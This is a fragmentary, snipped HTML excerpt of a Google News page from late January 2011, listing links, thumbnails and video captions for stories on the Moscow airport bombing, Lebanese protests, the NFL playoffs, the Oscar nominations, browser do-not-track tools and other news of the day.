<span><a target="_blank" class="usg-AFQjCNGUsVQVKmIv3zvO5QqlgBI0VTK7Bg " href="http://feeds.nytimes.com/click.phdo?i=c37a68a9d6c79074b075c0a6b2ae297e" id="MAA4AEgAUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4X2RBdB48v8y-fxtdopp5GU1JnQ " href="http://abcnews.go.com/US/president-obama-delivers-state-union-tonight-issue-important/story?id=12747572" id="MAA4AEgAUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcxqmcTJAqTpQk5GlOyJwheNHNzA " href="http://content.usatoday.com/communities/theoval/post/2011/01/obamas-day-state-of-the-union-1/1" id="MAA4AEgAUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/pdw41_LrPaNSwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHsV0WVSMU7BivakTp-qBPi9CJjwA " href="http://en.rian.ru/analysis/20110125/162296627.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=bzno493XK5M">Video:&nbsp;
Terror Fears: Savage explosion at Domodedovo airport shocks Russia
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bbc.co.uk/news/uk-12278369" target="_blank" class="usg-AFQjCNEuOgHgFhSFsE9OYmd5a2HRm0MTEA " id="MAA4AEgBUAFgAmoCdXM">Moscow bombing: British victim due to get married</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxTYZNqx9Pqfs5kxkoLCGrHwTuKw " href="http://www.csmonitor.com/World/terrorism-security/2011/0125/Moscow-terrorist-attack-blamed-on-airport-security-lapses" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXU8j1cMZh_AGcRx4h9byCKipUYA " href="http://abcnews.go.com/Business/wireStory?id=12755356" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEf884Is-krOtFly-f6dap_-WE5pg " href="http://www.ajc.com/business/moscow-blast-may-cause-815105.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sEKWE5k1cQjO7M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ "> msnbc.com </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJCGMec4aAF6jsyMH0o3M9k_Higg " href="http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=OfNTrVD0N4c">Video:&nbsp;
Day of Rage: Fire, gunshots, clashes in Lebanon's Beirut & Tripoli
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/WORLD/meast/01/25/lebanon.protests/" target="_blank" class="usg-AFQjCNHmqKy1P9U2-7wDaUrIvCHi2wdhRQ " id="MAA4AEgCUAFgAmoCdXM">In Lebanon, angry protests as a new PM is named</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjCYyjpabgS18o8SjBBmWqCFcd7Q " href="http://online.wsj.com/article/SB10001424052748704698004576103760527993764.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZAyGwNZT-1PI-dCnKg6q2PnxPoA " href="http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGkmWfO_v_jlzuW53qVhlIG_jalMQ " href="http://www.ynetnews.com/articles/0,7340,L-4018734,00.html" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGP2Lx4HObwksI_VucgzX0JwKLidA " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706780.htm" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA " title="ESPN (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/ze_Jah1aKnczKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA "> ESPN (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF1-j7B-WS6b4KS2j6SaVujbMit3Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=NJLHvIL-G4M">Video:&nbsp;
Packers Win but Bears' Cutler Grabs Headlines
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/" target="_blank" class="usg-AFQjCNFizdGGZBlsZzU4lRWmIiomju7WDQ " id="MAA4AEgDUAFgAmoCdXM">Cutler&#39;s passion questionable, not his toughness</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUrBKIcblqlwoyWEq8lYQAOjLyeA " href="http://www.wdel.com/story.php?id=31917" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE-bVr9MRWtioD4FbW9m8rRv4jKwg " href="http://www.indystar.com/article/20110125/SPORTS03/101250341/Those-who-know-Cutler-well-have-his-back-over-injury?odyssey=tab%7Cmostpopular%7Ctext%7CSPORTS" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHZToo71qS9mtu5zyHRWzSS8YWk6Q " href="http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3z0n4wX_WIMMptgoaL-KE5N0xhw " href="http://beargoggleson.com/2011/01/25/chicago-car-salesman-fired-for-wearing-packers-tie/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ " title="USA Today"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/tCst1ur0hPb3fM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.usatoday.com/life/movies/movieawards/oscars/2011-01-25-oscar-nominations-preview_N.htm" class="usg-AFQjCNFyRATycyqoonooqWdkAK0xpj1suQ "> USA Today </a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/popcandy/post/2011/01/what-do-you-think-of-the-oscar-nominations/1" target="_blank" class="usg-AFQjCNF_4suxPRRgxXoa_8Zp5SHu3jf6jQ " id="MAA4AEgEUAFgAmoCdXM">What do you think of the Oscar nominations?</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/film/2011/jan/25/oscars-colin-firth" target="_blank" class="usg-AFQjCNF7qCUzn_UOiBN60Cf4v4CoXreHbg " id="MAA4AEgEUAJgAmoCdXM">The King&#39;s Speech scores royal flush with 12 nods</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHod9JjR9y4F2FvohSndj5Y6BMBVw " href="http://www.chron.com/disp/story.mpl/ap/top/all/7396519.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEsu-DnmHIBuFL0DwwwRk8Vd4hjlw " href="http://www.mtv.com/news/articles/1656582/2011-oscar-nominations.jhtml" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEZ3l0V53faVCkMEw9KKd-PDkiE8w " href="http://www.cbsnews.com/stories/2011/01/25/entertainment/main7280739.shtml" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHL90AF5QbOJ_4UIYIc-Ile0M2y9w " href="http://www.baltimoresun.com/news/sns-ap-us-oscar-nominations,0,4030183.story?track=rss" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw " title="Washington Post"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/zzuaChiS-OW1xM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEgD_IaVkDTWoies8fgQaFficXY0Q " href="http://msn.foxsports.com/nfl/story/Steelers-ground-Jets-head-to-Super-Bowl-XLV-80094778" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://pittsburgh.sbnation.com/pittsburgh-steelers/2011/1/25/1954878/2011-super-bowl-pittsburgh-connections-green-bay-coaching-steelers-packers" target="_blank" class="usg-AFQjCNFtPlMqUrlhqvDofcXKtm0xg2Mjtg " id="MAA4AEgFUAFgAmoCdXM">2011 Super Bowl: Pittsburgh Connections Dominate Green Bay Coaching Staff</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH-Kxlqid8b-IfRxyra4u0KauMIoA " href="http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports" id="MAA4AEgFUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIhJoynuZBqroSpyNBnpnrbmCmGQ " href="http://www.locksmithsportspicks.com/super-bowl-45-betting-odds/" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMpJiNmDogxbdBXhcsuNwAd8h8ng " href="http://www.nytimes.com/2011/01/25/sports/football/25moments.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoxIksLdOiX2EP01Fp8STAYjKlTw " href="http://www.dallasnews.com/sports/super-bowl/20110124-melded-together-steelers-fans-share-special-bond-forged-in-fire.ece" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110117/middleton-wedding-dress-oldfield-110117/" class="usg-AFQjCNH4cbqwiireydgY7Zi2fXYqg181lQ " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/iMpPYm2zLW2H9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110117/middleton-wedding-dress-oldfield-110117/" class="usg-AFQjCNH4cbqwiireydgY7Zi2fXYqg181lQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGizn8FdbrlNoarxp9b2ChITIuSnQ " href="http://www.people.com/people/package/article/0,,20395222_20459577,00.html" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://newsfeed.time.com/2011/01/25/working-girl-to-royal-housewife-kate-middleton-quits-her-day-job/" target="_blank" class="usg-AFQjCNEy23pIeiwJOGqBOnxw3QMGH9MKpg " id="MAA4AEgGUAFgAmoCdXM">Working Girl to Royal Housewife: Kate Middleton Quits Her Day Job</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFECASiQrBtdHvW_9W0yts5KDSoHA " href="http://www.dailymail.co.uk/news/article-1350151/Kate-Middleton-prepares-Royal-housewife-life-leaving-parents-business.html?ito=feeds-newsxml" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl2VrqsfwEp8U6iWvchJszI29KoA " href="http://travel.usatoday.com/destinations/dispatches/post/2011/01/london-businesses-are-pushing-royal-wedding-packages-souvenirs/139960/1" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHHos6MO-HxbA1cqVFYOczn474tAA " href="http://www.reuters.com/article/idUSTRE70N73S20110124" id="MAA4AEgGUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/wxCcL8eCTK7UkM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHF-80bO00nIupmnFw1092G1GWWCQ " href="http://www.guardian.co.uk/world/2011/jan/25/palestine-papers-refugees-south-america" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=yQEnVIJmHvM">Video:&nbsp;
Palestine Papers anger East Jerusalem residents
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706837.htm" target="_blank" class="usg-AFQjCNHtiSGBKgb8AJ3pLsUWCx1en_clvQ " id="MAA4AEgHUAFgAmoCdXM">Abbas says never up Jerusalem</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHohl3vOEbaeeKD18YoSOK366LIZg " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12275942" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELlHb-F-z9krtQRtJ8LPf3lMtxZg " href="http://www.haaretz.com/news/diplomacy-defense/hamas-urges-palestinian-refugees-to-protest-over-concessions-on-right-of-return-1.339120" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEe7t59kCLaZEPNgdIrx-d03Dyb5w " href="http://www.jpost.com/DiplomacyAndPolitics/Article.aspx?id=205147" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIR3qqw7II_X8azn_RfNVJcHt6tQ " href="http://gulfnews.com/news/region/palestinian-territories/pna-to-sue-al-jazeera-channel-1.751956" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw " title="ZDNet UK"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/KH3wcH3fa03OHM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw "> ZDNet UK </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGuDbOaMWITubQMDQRm3Vh0Egtf8g " href="http://www.cnn.com/2011/TECH/web/01/25/do.not.track.features.fc/" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html" target="_blank" class="usg-AFQjCNFfT6geWCCP6E2QzH5FUqDG1X_6iQ " id="MAA4AEgIUAFgAmoCdXM">Mozilla to Add Do-not-track Feature to Firefox</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/" target="_blank" class="usg-AFQjCNERbSCK3kCQuoNkwZjlOSimSLZmSw " id="MAA4AEgIUAJgAmoCdXM">Google, Mozilla Adding New &#39;Do Not Track&#39; Features to Browsers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKzocjpu5vlhh-D6N9fc595X4mmA " href="http://www.fudzilla.com/home/item/21654-firefox-google-chrome-adding-do-not-track-tools" id="MAA4AEgIUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELbqLAIM8yn2z_8_-FVXf9K-dbYA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/technology-12275750" id="MAA4AEgIUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcQaqnZQeJ6RKQKdpso-J76DugIA " href="http://online.wsj.com/article/SB10001424052748704213404576100441609997236.html?mod=googlenews_wsj" id="MAA4AEgIUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHcZ0fugBcUA2k5qxjAGWVyS_21zQ " href="http://www.marketingpilgrim.com/2011/01/google-ad-track-blocker-%E2%80%9Ckeep-my-opt-outs%E2%80%9D-is-live.html" id="MAA4AEgIUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg " title="Straits Times"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/oq6s9DrJF70jrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.straitstimes.com/BreakingNews/TechandScience/Story/STIStory_627942.html" class="usg-AFQjCNGALC7pTP_HmeRCjaHR1Jmr2aDqSg "> Straits Tim... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGlOjCTDT0I5KjFM2nF9seR-UU1nA " href="http://www.allheadlinenews.com/briefs/articles/90032032?Heart%20disease%20costs%20expected%20to%20triple%20by%202030" id="MAA4AEgJUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://timesofindia.indiatimes.com/life-style/health-fitness/health/Lowering-BP-in-women-cuts-heart-disease-risk/articleshow/7361366.cms" target="_blank" class="usg-AFQjCNFVzg8Nh2UMpPqPxrXXGOK8ja_MPw " id="MAA4AEgJUAFgAmoCdXM">Lowering BP in women cuts heart disease risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.whec.com/news/stories/S1941039.shtml?cat=566" target="_blank" class="usg-AFQjCNE-xgnWt8tuHVa29gb4ru73IaOcRQ " id="MAA4AEgJUAJgAmoCdXM">Heart disease treatment costs expected to skyrocket</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" id="MAA4AEgJUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE_rV0f77uJmyZiUMloBc2lXdf9Pw " href="http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension" id="MAA4AEgJUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYHaS-zthcCySdDAWNVHb4SLIrsw " href="http://ozarksfirst.com/fulltext?nxd_id=392206" id="MAA4AEgJUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgJUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg " title="Siliconrepublic.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/JQezVTDMGKi-tM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.siliconrepublic.com/digital-life/item/20087-iphone-5-and-ipad-2-may-use" class="usg-AFQjCNH19WnfEMcBXsW7low3TQ4dVVnAfg "> Siliconrepu... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFCBrtD7WCE0PtKw7H7t44smvuv5w " href="http://www.appleinsider.com/articles/11/01/25/apple_finalizing_wireless_e_wallet_for_iphone_5_ipad_2_report.html" id="MAA4AEgKUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://mashable.com/2011/01/25/apple-nfc-iphone-ipad/" target="_blank" class="usg-AFQjCNGm6-ErpYiEamahs9RkfVGAzI01dg " id="MAA4AEgKUAFgAmoCdXM">Apple to Add NFC Functionality to iPhone and iPad [REPORT]</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.mobileburn.com/news.jsp?Id=12601" target="_blank" class="usg-AFQjCNEWDXM8PnAha4yiIzgRne1A7thEHQ " id="MAA4AEgKUAJgAmoCdXM">Apple planning NFC mobile payment system for iPhone, iPad 2</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHW5C8tZea1E7rask8sdgGgqH1sqA " href="http://www.pcworld.com/article/217649/new_iphones_ipad_likely_to_become_ewallets.html" id="MAA4AEgKUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNESRVBr6N4Mw53zwxbWqMXsPJcc9w " href="http://www.bloomberg.com/news/2011-01-25/apple-plans-service-that-lets-iphone-users-pay-with-handsets.html" id="MAA4AEgKUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGtHdkHfBoAIG1s9jPpelMaz6s2AA " href="http://www.techtree.com/India/News/Next_iPhone_iPad_will_let_You_Make_Purchases/551-114271-893.html" id="MAA4AEgKUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPeOouT9CckF0mUYysL730O7lrOg " href="http://www.ibtimes.com/articles/104716/20110125/apple-iphone-visa-mastercard-paypal-ebay-ipad-iphone-5-ipad-2-nfc-itunes-iad-google-google-checkout-.htm" id="MAA4AEgKUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " title="Los Angeles Times"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/KWy1eKrr9yjBVM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg "> Los Angeles... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHIHuMYemJrbj1dujgRqym-0lbnUg " href="http://www.latimes.com/health/boostershots/la-heb-new-food-labels-20110124,0,7387257.story" id="MAA4AEgLUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nacsonline.com/NACS/News/Daily/Pages/ND0125111.aspx" target="_blank" class="usg-AFQjCNEr5zGblJr5ydUyiba1wOen29-Mbw " id="MAA4AEgLUAFgAmoCdXM">Front-of-Pack Nutrition Labeling Initiative Launched</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html" target="_blank" class="usg-AFQjCNHk9NOZPdqDFXddElh8m_lvKF2RbA " id="MAA4AEgLUAJgAmoCdXM">Firms bring nutrition labels to fore</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamcPA0SL6kfHK0IbhjdKzrrU4yw " href="http://feeds.nytimes.com/click.phdo?i=4171574b1677b0877e85e5954148e69c" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGpdj32WiL_7ZiNsnnO8kzBHN3vGA " href="http://www.reuters.com/article/idUSTRE70O04520110125?feedType=RSS&amp;feedName=domesticNews" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGD_63K7i33pVnceXZLkDTbaItsoQ " href="http://www.usatoday.com/yourlife/food/diet-nutrition/2011-01-25-foodfight25_ST_N.htm" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIPTWyFOwFFj7H73Cs27lKSft3pQ " href="http://www.boston.com/business/articles/2011/01/25/nutrition_information_aimed_at_package_fronts/" id="MAA4AEgLUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA " title="Telegraph.co.uk"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/mJexcsYegVtuIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/technology/apple/8278278/Apples-App-store-hits-10-billionth-download.html" class="usg-AFQjCNFwrlLZUveAhyRcADwN9Y7RQ6glRA "> Telegraph.c... </a>
...[SNIP]...
